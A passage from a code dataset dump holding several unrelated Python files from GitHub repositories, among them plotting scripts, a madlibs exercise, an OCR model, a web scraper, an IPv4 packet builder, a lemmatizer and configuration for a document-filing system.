FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_MAC_Distribution, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelB3, Plot_Title=\"MAC Distribution\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"MAC_Distribution\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_MAC_Distribution)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"MSC_Distribution\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_MSC_Distribution, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelB4, Plot_Title=\"MSC Distribution\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"MSC_Distribution\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_MSC_Distribution)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Graph_Folder, FileName=\"Mass_Sample_Rho_Cte\", Extension=\"jpg\")\n FN.Fig_Plot_Save_1Lines_X_Log_Y_Dictionary_Linear(Address=Address, Identifier=Save_Situation, X_Array=Save_Diameter, Y_array=Save_Mass_Sample_2, X_Min=Sample_Diameter_Min, X_Max=Sample_Diameter_Max, X_Label=X_LabelA1, Y_label1=Y_LabelA7, Plot_Title=\"Mass Distribution using Constant Density\")\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"Mass_Sample_Rho_Cte\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_Mass_Sample_2)\n\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"MAC\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_MAC)\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"MSC_Total\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_MSC_Total)\n Address = FN.File_Pointer(Main=script_dir, FolderName=Results_Folder, FileName=\"MSC_Diff\", Extension=\"csv\")\n FN.Dictionary_ToCSV(Address, Save_MSC_Diff)\n","repo_name":"JieLuoybfq/FlareNet-Scattering-Absorption-Calculator","sub_path":"FSAC.py","file_name":"FSAC.py","file_ext":"py","file_size_in_byte":41145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"22143199531","text":"import re\n\nmadlib = \"The ADJECTIVE panda walked to the NOUN and then VERB. A nearby NOUN was unaffected by these events.\"\n\n# Get an array of parts of speech to be requested\npos_regex = re.compile(r'ADJECTIVE|NOUN|VERB')\npos_arr = pos_regex.findall(madlib)\n\n# For each part of speech in the array\nfor word in pos_arr:\n prompt = 'Enter a '\n if word == 'ADJECTIVE':\n prompt = 'Enter an '\n prompt += word.lower() + ': '\n\n # Replace part of speech with user's word\n word = input(prompt)\n\n # Substitute first instance of regex in string with new word\n madlib = pos_regex.sub(word, madlib, 1)\n\nprint(madlib)\n","repo_name":"brentirwin/automate-the-boring-stuff","sub_path":"ch8/madlibs.py","file_name":"madlibs.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"8115702335","text":"###\n# Tree DFS Serialization\n# Time Complexity: O(n^2) n nodes and build string O(n)\n# Space Complexity: O(n^2)\n###\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def findDuplicateSubtrees(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[TreeNode]\n \"\"\"\n d = collections.Counter()\n re = []\n self.dfs(root, d, re)\n return re\n \n def dfs(self, root, d, re):\n if not root:\n return \"#\"\n key = str(root.val) + \",\" + self.dfs(root.left, d, re) + \",\" + self.dfs(root.right, d, re)\n if d[key] == 1:\n re.append(root)\n d[key] += 1\n return key\n \n \n \n \n \n \n ","repo_name":"ihuei801/leetcode","sub_path":"MyLeetCode/python/Find Duplicate Subtrees.py","file_name":"Find Duplicate Subtrees.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"9944366951","text":"import segmentation_models as sm\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras.layers import Conv2D, BatchNormalization\nfrom tensorflow.keras.layers import GRU, Bidirectional\nfrom tensorflow.keras.layers import Dense, Activation\n\n\nfrom blocks import ctc_lambda_func, resnet_conv\n\n\n\ndef text_to_labels(text, letters):\n return np.asarray(list((map(lambda x: letters.index(x), text))))\n\ndef labels_to_text(labels, letters):\n return np.asarray(list((map(lambda x: letters[x], labels))))\n\n\n\n\ndef build_effnetb0_gru_ocr(\n letters_count,\n max_len_str,\n input_shape=(128, 1024),\n backbone_conv_filters=[256, 512],\n cnn_reshape_size=(32, 512),\n rnn_size=256,\n rnn_dropout=0.3,\n optimizer=tf.keras.optimizers.Adam(),\n):\n\n\n '''\n block4a_expand_activation (Acti (None, 16, 64, 240) \n block2b_activation (Activation) (None, 32, 128, 144) \n block6a_activation\n '''\n\n model = sm.Unet('efficientnetb0', input_shape=input_shape, activation='sigmoid', decoder_block_type='upsampling')\n\n backbone = tf.keras.Model(inputs=model.input, outputs=model.get_layer('block6a_activation').output)\n\n backbone_output = backbone.output\n\n x = resnet_conv(backbone_output, s=[3, 1], filters=backbone_conv_filters)\n\n x = tf.keras.layers.Reshape(target_shape=cnn_reshape_size, name='reshape')(x)\n \n x = Bidirectional(GRU(rnn_size, return_sequences=True, kernel_initializer='he_normal', dropout=rnn_dropout))(x)\n\n x = Bidirectional(GRU(rnn_size, return_sequences=True, kernel_initializer='he_normal', dropout=rnn_dropout))(x)\n\n x = BatchNormalization()(x)\n\n x = Dense(letters_count, kernel_regularizer=tf.keras.regularizers.l1_l2(l1=1e-5, l2=1e-4))(x)\n y_pred = Activation('softmax', name='softmax')(x)\n\n\n y_true = tf.keras.layers.Input(name='y_true', shape=[max_len_str], dtype='float32')\n\n input_length = tf.keras.layers.Input(name='input_length', shape=[1], dtype='int64')\n\n label_length = tf.keras.layers.Input(name='label_length', shape=[1], dtype='int64')\n\n loss = tf.keras.layers.Lambda(ctc_lambda_func, output_shape=(1,), name='ctc')([y_true, y_pred, input_length, label_length])\n\n model = tf.keras.Model(inputs=[backbone.input, y_true, input_length, label_length], outputs=loss)\n\n model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=optimizer)\n \n return model","repo_name":"dragynir/deeplr","sub_path":"models/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"40928914216","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom api.proxy import Random_Proxy\n\n'''\nCredits: Joshua .\nURL: https://lethals.org.\nCopyright\\Trademark: © 2022 - 2023 Lethal Services ™ ​| All rights reserved.\n'''\n\ndef getAnihdPlay(host, query, page, proxie):\n moviesDictionary = {'Status': True,'Query': query,'Results': []}\n proxy = Random_Proxy()\n try:\n if proxie == 'true':\n if page != None:\n base_url = f'https://{host}/search.html?keyword={query}&page={page}'\n currentPage = page\n r = proxy.Proxy_Request(url=base_url, request_type='get')\n soup = BeautifulSoup(r.content, 'lxml')\n else:\n base_url = f'https://{host}/search.html?keyword={query}'\n currentPage = '1'\n r = proxy.Proxy_Request(url=base_url, request_type='get')\n soup = BeautifulSoup(r.content, 'lxml')\n else:\n if page != None:\n base_url = f'https://{host}/search.html?keyword={query}&page={page}'\n currentPage = page\n soup = BeautifulSoup(requests.get(base_url).content, 'lxml')\n else:\n base_url = f'https://{host}/search.html?keyword={query}'\n currentPage = '1'\n soup = BeautifulSoup(requests.get(base_url).content, 'lxml')\n except requests.exceptions.RequestException as e:\n moviesDictionary['Status'] = False,\n moviesDictionary['error'] = str(e),\n return moviesDictionary\n\n moviesDictionary['Page'] = currentPage\n items = soup.find_all('li', class_=\"video-block\")\n\n for item in items:\n try:\n #link\n a = item.find('a')\n href = a.get('href')\n link = f'https://{host}{href}'\n #Movie Cover\n conver = item.find('div', class_=\"picture\")\n img = conver.find('img')\n poster = img['src']\n #Movie Title\n Name = item.find('div', class_=\"name\").text\n nl0 = Name.replace('\\n ', \"\")\n Title = nl0.replace(' \\n ', \"\")\n \n Year = item.find('span', class_=\"date\").text\n \n except Exception as e:\n link = str(e) \n poster = str(e)\n Title = str(e)\n Year = str(e)\n \n moviesObject = {'Title': Title, 'Cover': poster, 'link': link, 'Date': Year} \n moviesDictionary['Results'].append(moviesObject)\n \n return moviesDictionary","repo_name":"LethalServices/SearchAPI","sub_path":"api/anihdplay.py","file_name":"anihdplay.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"73717839597","text":"\"\"\"\n Created by tareq on ২৭/৬/১৯\n\"\"\"\nfrom rest_framework import status\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom sol_factory.users.models import UserVerificationLink\n\n__author__ = \"Tareq\"\n\n\nclass UserVerificationView(APIView):\n permission_classes = (AllowAny,)\n\n def get(self, request, *args, **kwargs):\n try:\n verification_code = kwargs.get('verification_code', None)\n verified_user = UserVerificationLink.verify_user_via_verification_link(verification_uid=verification_code)\n data = {\n 'user_id': verified_user.pk,\n 'message': \"Verification successful\",\n 'success': True\n }\n return Response(\n data=data, status=status.HTTP_200_OK, content_type=\"application/json\"\n )\n except Exception as exp:\n data = {\n 'message': str(exp), 'success': False\n }\n return Response(\n data=data, status=status.HTTP_500_INTERNAL_SERVER_ERROR, content_type=\"application/json\"\n )\n","repo_name":"ashfaqshuvo007/shop_django_api","sub_path":"sol_factory/users/views/user_verification_view.py","file_name":"user_verification_view.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"13645890496","text":"from fractions import Fraction\nfrom utils import Error,HurwitzBase,extractTopZeros,areCoefficiensPositive\n\nclass HurwitzStabililtyTestForRealPolymonials(HurwitzBase):\n \"\"\"\n Algorithm 1.2\n \"\"\"\n\n def __init__(self, coefficients=[]):\n super().__init__()\n self.coefficients = extractTopZeros(coefficients)\n self.degree = len(coefficients) - 1\n\n # check args\n if (len(self.coefficients) == 0):\n raise Error(\"No coefficients Error\")\n # extract top 0s\n\n # 係数の政府の判定\n if not areCoefficiensPositive(self.coefficients):\n raise Error(\n \"invalid Coefficients. given coefficients include negative values\"\n )\n\n def makePolynomialQ(self, coefficients):\n Q_coefficients = []\n isEven = True\n\n # 数値的処理\n #mu = coefficients[0]/coefficients[1]\n mu = Fraction(coefficients[0], coefficients[1])\n # 高次の項から処理していく\n for i in range(1, len(coefficients) - 1):\n if isEven:\n Q_coefficients.append(coefficients[i])\n else:\n Q_coefficients.append(\n coefficients[i] - mu * coefficients[i + 1])\n # 交互に処理を変える\n isEven = not isEven\n # 定数項を加える.\n Q_coefficients.append(coefficients[-1])\n if len(Q_coefficients) != len(coefficients) - 1:\n raise Error(\"invalid degreen of Q\")\n return Q_coefficients\n\n def firstStep(self, coefficients):\n P_array = []\n\n if not areCoefficiensPositive(coefficients):\n raise Error(\n \"invalid Coefficients. given coefficinets include negative value\"\n )\n P_array.append(coefficients)\n return P_array\n\n def secondStep(self, P_array, number: int):\n \"\"\"\n number(int): how many times\n \"\"\"\n assert number == len(P_array)-1, \"mismatch number and array's length\"\n if number == len(P_array)-1:\n raise Error(\"mismatch number and array's length\")\n\n coefficients = P_array[number]\n # メソッドの終了\n if not areCoefficiensPositive(coefficients):\n return False\n\n if number == self.degree - 2:\n return False\n\n return True\n\n def thirdStep(self, old_P_array, Q_coefficients):\n P_array = old_P_array.copy()\n P_array.append(self.makePolynomialQ(Q_coefficients))\n return P_array\n\n def execute(self):\n coefficients = self.coefficients\n\n # contain coeffients of each step.\n P_array = self.firstStep(coefficients)\n check = True\n isHurwitz = False\n number = 0\n\n if (self.degree == 0):\n return True\n\n while (True):\n check = self.secondStep(P_array, number)\n if not check:\n if number == self.degree - 2:\n isHurwitz = True\n break\n P_array = self.thirdStep(\n old_P_array=P_array, Q_coefficients=P_array[-1])\n number += 1\n self.P_array = P_array\n return isHurwitz","repo_name":"kmdmnak/Hurwitz","sub_path":"api/Hurwitz/others/RealPolynomial.py","file_name":"RealPolynomial.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"36443454802","text":"import os\r\nimport json\r\nfrom automic_rest import config\r\nimport requests\r\nfrom requests.exceptions import HTTPError\r\nfrom requests.exceptions import Timeout\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\n\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\n\r\n\r\n\r\nclass ping:\r\n def __init__(self):\r\n # Summary: Can be used to determine if the JCP process is currently running.\r\n self.response = None \r\n self.body = None \r\n self.url = None \r\n self.headers = None \r\n self.content = None \r\n self.text = None \r\n self.status = None \r\n self.path = config().setArgs('/ping', locals())\r\n\r\n self.request() \r\n\r\n def request(self): \r\n requests_headers = {\r\n 'Content-type': 'application/json', \r\n 'Accept': 'application/json', \r\n 'Authorization' : \"Basic %s\" % config().base64auth \r\n }\r\n try: \r\n r = requests.get(\r\n config().url+self.path, \r\n headers=requests_headers,\r\n verify=config().sslverify, \r\n timeout=config().timeout \r\n ) \r\n self.status = r.status_code \r\n # If the response was successful, no Exception will be raised \r\n r.raise_for_status() \r\n except HTTPError as http_err: \r\n print(f'HTTP error occurred: {http_err}') # Python 3.6 \r\n except Exception as err: \r\n print(f'Other error occurred: {err}') # Python 3.6 \r\n except Timeout: \r\n print('The request timed out') \r\n else: \r\n pass \r\n \r\n \r\n return self \r\n","repo_name":"ufopilot/automic_rest","sub_path":"automic_rest/ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"72174704876","text":"# -*- coding: utf-8 -*-\n\nimport attr\nimport json\nimport logging\nimport numbers\nimport os\n\nfrom os.path import commonprefix\nfrom collections import Counter, defaultdict\nfrom tqdm import tqdm\n\nfrom allennlp.data.fields import SequenceLabelField\n\nlogger = logging.getLogger(__name__)\n\n\n@attr.s(frozen=True)\nclass LemmatizeRule(object):\n cut_prefix = attr.ib(default=0)\n cut_suffix = attr.ib(default=0)\n append_suffix = attr.ib(default='')\n lower = attr.ib(default=False)\n capitalize = attr.ib(default=False)\n upper = attr.ib(default=False)\n\n\nclass LemmatizeHelper(object):\n UNKNOWN_RULE_INDEX = 0\n _UNKNOWN_RULE_PLACEHOLDER = LemmatizeRule(cut_prefix=100, cut_suffix=100, append_suffix='-' * 90)\n _OUTPUT_FILE_NAME = 'lemmatizer_info.json'\n\n def __init__(self, lemmatize_rules=None):\n self._lemmatize_rules = lemmatize_rules\n self._index_to_rule = self._get_index_to_rule()\n\n def fit(self, data, min_freq=3):\n rules_counter = Counter()\n\n for instance in tqdm(data):\n meta = instance.fields['metadata']\n words, lemmas = meta['words'], meta['lemmas']\n for word, lemma in zip(words, lemmas):\n if lemma == '_' and word != '_':\n continue\n\n rule = self.predict_lemmatize_rule(word, lemma)\n rules_counter[rule] += 1\n\n assert self.lemmatize(word, rule).replace('ё', 'е') == lemma.replace('ё', 'е')\n\n self._lemmatize_rules = {\n self._UNKNOWN_RULE_PLACEHOLDER: self.UNKNOWN_RULE_INDEX,\n LemmatizeRule(): self.UNKNOWN_RULE_INDEX + 1\n }\n skipped_count, total_count = 0., 0\n for rule, count in rules_counter.most_common():\n total_count += count\n if count < min_freq:\n skipped_count += count\n continue\n\n if rule not in self._lemmatize_rules:\n self._lemmatize_rules[rule] = len(self._lemmatize_rules)\n\n self._index_to_rule = self._get_index_to_rule()\n\n logger.info('Lemmatize rules count = {}, did not cover {:.2%} of words'.format(\n len(self._lemmatize_rules), skipped_count / total_count))\n\n def _get_index_to_rule(self):\n if not self._lemmatize_rules:\n return []\n return [rule for rule, _ in sorted(self._lemmatize_rules.items(), key=lambda pair: pair[1])]\n\n def get_rule_index(self, word, lemma):\n if lemma == '_' and word != '_':\n return self.UNKNOWN_RULE_INDEX\n\n rule = self.predict_lemmatize_rule(word, lemma)\n return self._lemmatize_rules.get(rule, self.UNKNOWN_RULE_INDEX)\n\n def get_rule_indices(self, instance):\n meta = instance.fields['metadata']\n words, lemmas = meta['words'], meta['lemmas']\n\n return [self.get_rule_index(word, lemma) for word, lemma in zip(words, lemmas)]\n\n def get_rule(self, rule_index):\n return self._index_to_rule[rule_index]\n\n def __len__(self):\n return len(self._lemmatize_rules)\n\n @staticmethod\n def predict_lemmatize_rule(word: str, lemma: str):\n def _predict_lemmatize_rule(word: str, lemma: str, **kwargs):\n if len(word) == 0:\n return LemmatizeRule(append_suffix=lemma, **kwargs)\n\n common_prefix = commonprefix([word, lemma])\n if len(common_prefix) == 0:\n rule = _predict_lemmatize_rule(word[1:], lemma, **kwargs)\n return attr.evolve(rule, cut_prefix=rule.cut_prefix + 1)\n\n return LemmatizeRule(cut_suffix=len(word) - len(common_prefix),\n append_suffix=lemma[len(common_prefix):], **kwargs)\n\n word, lemma = word.replace('ё', 'е'), lemma.replace('ё', 'е')\n return min([\n _predict_lemmatize_rule(word, lemma),\n _predict_lemmatize_rule(word.lower(), lemma, lower=True),\n _predict_lemmatize_rule(word.capitalize(), lemma, capitalize=True),\n _predict_lemmatize_rule(word.upper(), lemma, upper=True)\n ], key=lambda rule: rule.cut_prefix + rule.cut_suffix)\n\n def lemmatize(self, word, rule):\n if isinstance(rule, numbers.Integral):\n rule = self.get_rule(rule)\n\n assert isinstance(rule, LemmatizeRule)\n\n if rule.lower:\n word = word.lower()\n if rule.capitalize:\n word = word.capitalize()\n if rule.upper:\n word = word.upper()\n\n if rule.cut_suffix != 0:\n lemma = word[rule.cut_prefix: -rule.cut_suffix]\n else:\n lemma = word[rule.cut_prefix:]\n lemma += rule.append_suffix\n\n return lemma\n\n def apply_to_instances(self, instances):\n for instance in tqdm(instances, 'Lemmatizer apply_to_instances'):\n lemmatize_rule_indices = self.get_rule_indices(instance)\n field = SequenceLabelField(lemmatize_rule_indices, instance.fields['words'], 'lemma_index_tags')\n instance.add_field('lemma_indices', field)\n\n def save(self, dir_path):\n with open(os.path.join(dir_path, self._OUTPUT_FILE_NAME), 'w') as f:\n index_to_rule = [attr.asdict(rule) for rule in self._index_to_rule]\n json.dump(index_to_rule, f, indent=2, ensure_ascii=False)\n\n @classmethod\n def load(cls, dir_path):\n with open(os.path.join(dir_path, cls._OUTPUT_FILE_NAME)) as f:\n index_to_rule = json.load(f)\n\n lemmatize_rules = {\n LemmatizeRule(**rule_dict): index\n for index, rule_dict in enumerate(index_to_rule)\n }\n\n return cls(lemmatize_rules)\n","repo_name":"DanAnastasyev/GramEval2020","sub_path":"solution/train/lemmatize_helper.py","file_name":"lemmatize_helper.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"73"} +{"seq_id":"32089108763","text":"from ipaddress import IPv4Address\n\nfrom construct import \\\n Const, Struct, BitStruct, \\\n Flag, Nibble, Int8ub, Int16ub, BitsInteger, \\\n Bytes, GreedyBytes\n\nfrom utils import ones_complement_checksum\n\n\n_TYPICAL_MTU = 1500\n\n\nclass Packet:\n _HEADER = Struct(\n BitStruct(\n \"version\" / Const(4, Nibble),\n \"IHL\" / Const(5, Nibble) # Options are not supported so size is fixed\n ),\n \"TOS\" / Const(0, Int8ub), # Type of Service\n \"total_length\" / Int16ub,\n \"identification\" / Int16ub,\n BitStruct( # NOTE: Fragmentation not supported\n Const(False, Flag), # NOTE: Reserved by the protocol\n \"DF\" / Const(True, Flag),\n \"MF\" / Const(False, Flag),\n \"fragment_offset\" / Const(0, BitsInteger(13)),\n ),\n \"TTL\" / Int8ub,\n \"protocol\" / Int8ub,\n \"checksum\" / Int16ub,\n \"source_address\" / Bytes(4),\n \"destination_address\" / Bytes(4),\n # NOTE: header options are not supported, but they should come here\n )\n\n _STRUCT = Struct(\n \"header\" / _HEADER,\n \"data\" / GreedyBytes\n )\n\n def __init__(self, source_address, dest_address, identification=0, ttl=64, protocol=0, data=b\"\"):\n self._source_address = IPv4Address(source_address)\n self._dest_address = IPv4Address(dest_address)\n self._identification = identification\n self._ttl = ttl\n self._protocol = protocol\n self._header_checksum = 0\n self._data = data\n\n if len(self.build()) > _TYPICAL_MTU:\n raise ValueError(\"Packet size exceeds typical IPv4 MTU, fragmentation not supported\")\n\n def build(self) -> bytes:\n packet = {\n \"header\": {\n \"total_length\": 0,\n \"identification\": self._identification,\n \"TTL\": self._ttl,\n \"protocol\": self._protocol,\n \"checksum\": 0,\n \"source_address\": self._source_address.packed,\n \"destination_address\": self._dest_address.packed,\n },\n \"data\": self._data\n }\n\n total_length = len(self._STRUCT.build(packet))\n packet[\"header\"][\"total_length\"] = total_length\n packet[\"header\"][\"checksum\"] = ones_complement_checksum(\n self._HEADER.build(packet[\"header\"])\n )\n\n return self._STRUCT.build(packet)\n","repo_name":"segalmatan/pcap_creator","sub_path":"src/ipv4.py","file_name":"ipv4.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"29883435197","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport pprint\n\nfrom librerias.datos.base import globales\n\n########\n# PQRS #\n########\nradicado_web_juridico = {\n \"definicion\": {\n \"id\" : \"35\",\n \"nombre\": \"RADICACIóN - Radicación Persona JURIDICA\"\n },\n\n \"grid\": {\n \"componente\": \"radicado_general_grid\", \n \"texto\" : \"Radicación Persona JURIDICA\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"Formularios web\",\n },\n\n \"forma\": {\n \"componente\": \"radicado_juridica_forma\", \n \"texto\" : \"Entradas radicados Ventanilla\",\n \"tipo\" : \"importar\"\n }\n}\n\nradicado_web_natural = {\n \"definicion\": {\n \"id\" : \"36\",\n \"nombre\": \"RADICACIóN - Radicación Persona Natural\"\n },\n\n \"grid\": {\n \"componente\": \"natural_radicados_grid\", \n \"texto\" : \"Radicación Persona Natural\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"Formularios web\",\n },\n\n \"forma\": {\n \"componente\": \"natural_web_forma\", \n \"texto\" : \"Entradas radicados Web\",\n \"tipo\" : \"importar\"\n }\n}\n\nradicado_web_anonimo = {\n \"definicion\": {\n \"id\" : \"37\",\n \"nombre\": \"RADICACIóN - Radicación Anonimo\"\n },\n\n \"grid\": {\n \"componente\": \"anonimo_radicados_grid\", \n \"texto\" : \"Radicación Anonimo\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"Formularios web\",\n },\n\n \"forma\": {\n \"componente\": \"anonimo_web_forma\", \n \"texto\" : \"Entradas radicados Web\",\n \"tipo\" : \"importar\"\n }\n}\n\nasignar_pqrs = {\n \"definicion\": {\n \"id\" : \"38\",\n \"nombre\": \"RADICACIóN - Asignación y traslado de radicados PQRS\"\n },\n\n \"grid\": {\n \"componente\": \"grid_pqrs_asigna_grid\", \n \"texto\" : \"Asignación y traslado de radicados PQRS\",\n \"icon\" : \"\", \n \"navegar\" : \"si\",\n \"padre\" : \"PQRSDF\",\n \"tipo\" : \"importar\",\n }, \n\n \"forma\": {\n \"componente\": \"forma_pqrs_asigna\", \n \"texto\" : \"Asignación y traslado de PQRS\",\n \"tipo\" : \"importar\"\n }\n}\n\npqrs_radicado = {\n \"definicion\": {\n \"id\" : \"39\",\n \"nombre\": \"RADICACIóN - Radicación PQRS\"\n },\n\n \"grid\": {\n \"componente\": \"grid_radica_asigna_grid\", \n \"texto\" : \"Radicación\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"PQRSDF\",\n },\n\n \"forma\": {\n \"componente\": \"pqrs_radicado_forma\", \n \"texto\" : \"Radicación PQRSDF\",\n \"tipo\" : \"importar\"\n },\n\n \"adicionales\": [\n {\n \"componente\": \"forma_radicado_consulta\", \n \"texto\" : \"Consulta Radicados\",\n \"tipo\" : \"importar\"\n }\n ]\n}\n\n#######################\n# VENTANILLA RADICADO #\n#######################\n\nasignar_ventanilla = {\n \"definicion\": {\n \"id\" : \"411\",\n \"nombre\": \"RADICACIóN - Asignación y traslado de radicados VENTANILLA\"\n },\n\n \"grid\": {\n \"componente\": \"grid_ventanilla_asigna_grid\", \n \"texto\" : \"Asignación y traslado de radicados\",\n \"icon\" : \"\", \n \"navegar\" : \"si\",\n \"padre\" : \"Ventanilla Radicación\",\n \"tipo\" : \"importar\",\n }, \n\n \"forma\": {\n \"componente\": \"forma_ventanilla_asigna\", \n \"texto\" : \"Asignación y traslado\",\n \"tipo\" : \"importar\"\n }\n}\n\n\nventanilla_radicado = {\n \"definicion\": {\n \"id\" : \"41\",\n \"nombre\": \"RADICACIóN - Radicación\"\n },\n\n \"grid\": {\n \"componente\": \"ventanilla_radicado_grid\", \n \"texto\" : \"Radicación\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"Ventanilla Radicación\",\n \"tipo\" : \"importar\"\n },\n\n \"forma\": {\n \"componente\": \"forma_radicado_consulta\", \n \"texto\" : \"Consulta Radicados\",\n \"tipo\" : \"importar\"\n },\n\n \"adicionales\": [\n {\n \"componente\": \"ventanilla_radicado_forma\", \n \"texto\" : \"Radica entradas\",\n \"tipo\" : \"importar\"\n }\n ]\n\n}\n\nventanilla_radicado_consulta = {\n \"definicion\": {\n \"id\" : \"411\",\n \"nombre\": \"RADICACIóN - Consulta Radicados\"\n },\n\n \"forma\": {\n \"componente\": \"forma_radicado_consulta\", \n \"texto\" : \"Consulta Radicados\",\n \"tipo\" : \"importar\"\n }\n}\n\nventanilla_radicado_gestion = {\n \"definicion\": {\n \"id\" : \"4111\",\n \"nombre\": \"RADICACIóN - Consulta (Entrada, Salida, Interno)\"\n },\n\n \"grid\": {\n \"componente\": \"grid_gestion_consulta_entidad\", \n \"texto\" : \"Radicada consulta TODOS\",\n \"icon\" : \"\", \n \"navegar\" : \"si\",\n \"padre\" : \"Ventanilla Radicación\",\n \"tipo\" : \"importar\",\n },\n\n \"forma\": {\n \"componente\": \"forma_salida_consulta\", \n \"texto\" : \"Gestión consulta salidas\",\n \"tipo\" : \"importar\",\n },\n\n \"adicionales\": [\n {\n \"componente\": \"forma_radicado_consulta\", \n \"texto\" : \"Consulta Radicados Entrada\",\n \"tipo\" : \"importar\"\n },\n\n {\n \"componente\": \"forma_interno_consulta\", \n \"texto\" : \"Consulta Radicados\",\n \"tipo\" : \"importar\"\n }\n ]\n}\n\n\n#####################\n# VENTANILLA SALIDA #\n#####################\nventanilla_salida = {\n \"definicion\": {\n \"id\" : \"42\",\n \"nombre\": \"CONSULTA - Salidas\"\n },\n\n \"grid\": {\n \"componente\": \"grid_ventanilla_salida\", \n \"texto\" : \"Salidas\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"Salidas\",\n },\n\n \"forma\": {\n \"componente\": \"forma_salida_consulta\", \n \"texto\" : \"Consulta Salida\",\n \"tipo\" : \"importar\"\n }\n}\n\n######################\n# VENTANILLA INTERNO #\n######################\nventanilla_interno = {\n \"definicion\": {\n \"id\" : \"543\",\n \"nombre\": \"RADICACIóN - Radicación Interno\"\n },\n\n \"grid\": {\n \"componente\": \"ventanilla_interno_grid\", \n \"texto\" : \"Radicación Interno\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"Ventanilla Radicación\",\n },\n\n \"forma\": {\n \"componente\": \"ventanilla_interno_forma\", \n \"texto\" : \"Radicación Ventanilla Interno\",\n \"tipo\" : \"importar\"\n }\n}\n\nventanilla_interno_consulta = {\n \"definicion\": {\n \"id\" : \"5543\",\n \"nombre\": \"RADICACIóN - Consulta Radicados Interno\"\n },\n\n \"forma\": {\n \"componente\": \"ventanilla_interno_consulta\", \n \"texto\" : \"Consulta Radicados Interno\",\n \"tipo\" : \"importar\"\n }\n}\n\n################\n# CONSULTA WEB #\n################\nconsulta_radicados_web = {\n \"definicion\": {\n \"id\" : \"100\",\n \"nombre\": \"WEB - CONSULTA ESTADO RADICADO\"\n },\n\n \"grid\": {\n \"componente\": \"ventanilla_interno_grid\", \n \"texto\" : \"Radicación Interno\",\n \"icon\" : \"\",\n \"tipo\" : \"importar\",\n \"navegar\" : \"si\",\n \"padre\" : \"Ventanilla Radicaci��n\",\n },\n}\n\n################\n# RADICA CORREO #\n################\ncorreos_grid = {\n \"definicion\": {\n \"id\" : \"110\",\n \"nombre\": \"RADICACIóN - CORREOS POR RADICAR\"\n },\n\n \"grid\": {\n \"componente\": \"correos_grid\", \n \"texto\" : \"Radicación de Correos\",\n \"navegar\" : \"si\",\n \"padre\" : \"Ventanilla Radicación\",\n \"tipo\" : \"importar\",\n },\n\n \"forma\": 